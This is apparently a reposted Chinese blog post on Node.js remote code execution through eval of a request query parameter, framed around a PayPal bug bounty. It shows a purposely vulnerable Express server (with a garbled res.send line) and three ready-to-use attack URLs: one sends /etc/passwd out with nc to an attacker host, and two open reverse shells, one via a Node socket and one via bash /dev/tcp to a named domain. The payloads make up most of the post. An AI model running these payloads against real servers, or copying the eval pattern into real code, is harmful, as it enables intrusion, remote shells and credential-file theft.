首页
所有分类
TAGS
文字工具 EMOJI BIBLE
服务器 NodeJs

NodeJS远程代码执行

Posted in NodeJs onAugust 28, 2016

背景

@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。

测试

var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

NodeJS远程代码执行

- Author -

hebedich

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

NodeJs 相关文章推荐
nodejs实现黑名单中间件设计
Jun 17 NodeJs
如何正确使用Nodejs 的 c++ module 链接到 OpenSSL
Aug 03 NodeJs
nodejs修复ipa处理过的png图片
Feb 17 NodeJs
用NodeJS实现批量查询地理位置的经纬度接口
Aug 16 NodeJs
Jquery通过ajax请求NodeJS返回json数据实例
Nov 08 NodeJs
Nodejs进阶:如何将图片转成datauri嵌入到网页中去实例
Nov 21 NodeJs
用Nodejs搭建服务器访问html、css、JS等静态资源文件
Apr 28 NodeJs
NodeJS使用七牛云存储上传文件的方法
Jul 24 NodeJs
详解NodeJS Https HSM双向认证实现
Mar 12 NodeJs
M2实现Nodejs项目自动部署的方法步骤
May 05 NodeJs
纯异步nodejs文件夹(目录)复制功能
Sep 03 NodeJs
nodejs使用Sequelize框架操作数据库的实现
Oct 21 NodeJs
用NodeJS实现批量查询地理位置的经纬度接口
Aug 16 #NodeJs
使用nodejs中httpProxy代理时候出现404异常的解决方法
Aug 15 #NodeJs
NodeJs的优势和适合开发的程序
Aug 14 #NodeJs
在windows上用nodejs搭建静态文件服务器的简单方法
Aug 11 #NodeJs
Nodejs抓取html页面内容(推荐)
Aug 11 #NodeJs
用nodejs的实现原理和搭建服务器(动态)
Aug 10 #NodeJs
nodejs如何获取时间戳与时间差
Aug 03 #NodeJs
Spring JPA(1) Switch(1) REST(1) 慢日志(1) cmd(1) 相对路径 (1) exists(2) mt-swipe(1) 远程桌面(2) Mint UI(1)
You might like
全国FM电台频率大全 - 26 西藏自治区
2020/03/11 无线电
php+mysql写的简单留言本实例代码
2008/07/25 PHP
layui框架实现文件上传及TP3.2.3(thinkPHP)对上传文件进行后台处理操作示例
2018/05/12 PHP
javascript的trim,ltrim,rtrim自定义函数
2008/09/21 Javascript
高效的获取当前元素是父元素的第几个子元素
2013/10/15 Javascript
登陆成功后自动计算秒数执行跳转
2014/01/23 Javascript
解决json日期格式问题的3种方法
2014/02/02 Javascript
jquery实现全屏滚动
2015/12/28 Javascript
D3.js实现饼状图的方法详解
2016/09/21 Javascript
详解js的延迟对象、跨域、模板引擎、弹出层、AJAX【附实例下载】
2016/12/19 Javascript
JavaScript实现经典排序算法之插入排序
2016/12/28 Javascript
jquery easyui dataGrid动态改变排序字段名的方法
2017/03/02 Javascript
基于JavaScript实现无缝滚动效果
2017/07/21 Javascript
如何编写一个完整的Angular4 FormText 组件
2017/11/18 Javascript
详解tween.js 中文使用指南
2018/01/05 Javascript
网页爬虫之cookie自动获取及过期自动更新的实现方法
2018/03/06 Javascript
对vue事件的延迟执行实例讲解
2018/08/28 Javascript
jquery获取file表单选择文件的路径、名字、大小、类型
2019/01/18 jQuery
解决vue单页面应用进入页面加载所有 js 的问题
2020/08/12 Javascript
[02:56]《DAC最前线》之国外战队抵达上海备战亚洲邀请赛
2015/01/28 DOTA
Python cx_freeze打包工具处理问题思路及解决办法
2016/02/13 Python
Python 常用 PEP8 编码规范详解
2017/01/22 Python
python GUI实现小球满屏乱跑效果
2019/05/09 Python
python序列化与数据持久化实例详解
2019/12/20 Python
超市营业员求职简历的自我评价
2013/10/17 职场文书
基层工作经历证明
2014/01/13 职场文书
建筑项目策划书
2014/01/13 职场文书
成考报名单位证明范本
2014/01/16 职场文书
新学期家长寄语
2014/01/19 职场文书
大学计划书范文800字
2014/08/14 职场文书
公安局副政委班子个人对照检查材料
2014/10/04 职场文书
优秀共产党员推荐材料
2014/12/18 职场文书
2015年行政工作总结范文
2015/04/09 职场文书
新娘婚礼答谢词
2015/09/29 职场文书
Python爬取用户观影数据并分析用户与电影之间的隐藏信息!
2021/06/29 Python
利用 SQL Server 过滤索引提高查询语句的性能分析
2021/07/15 SQL Server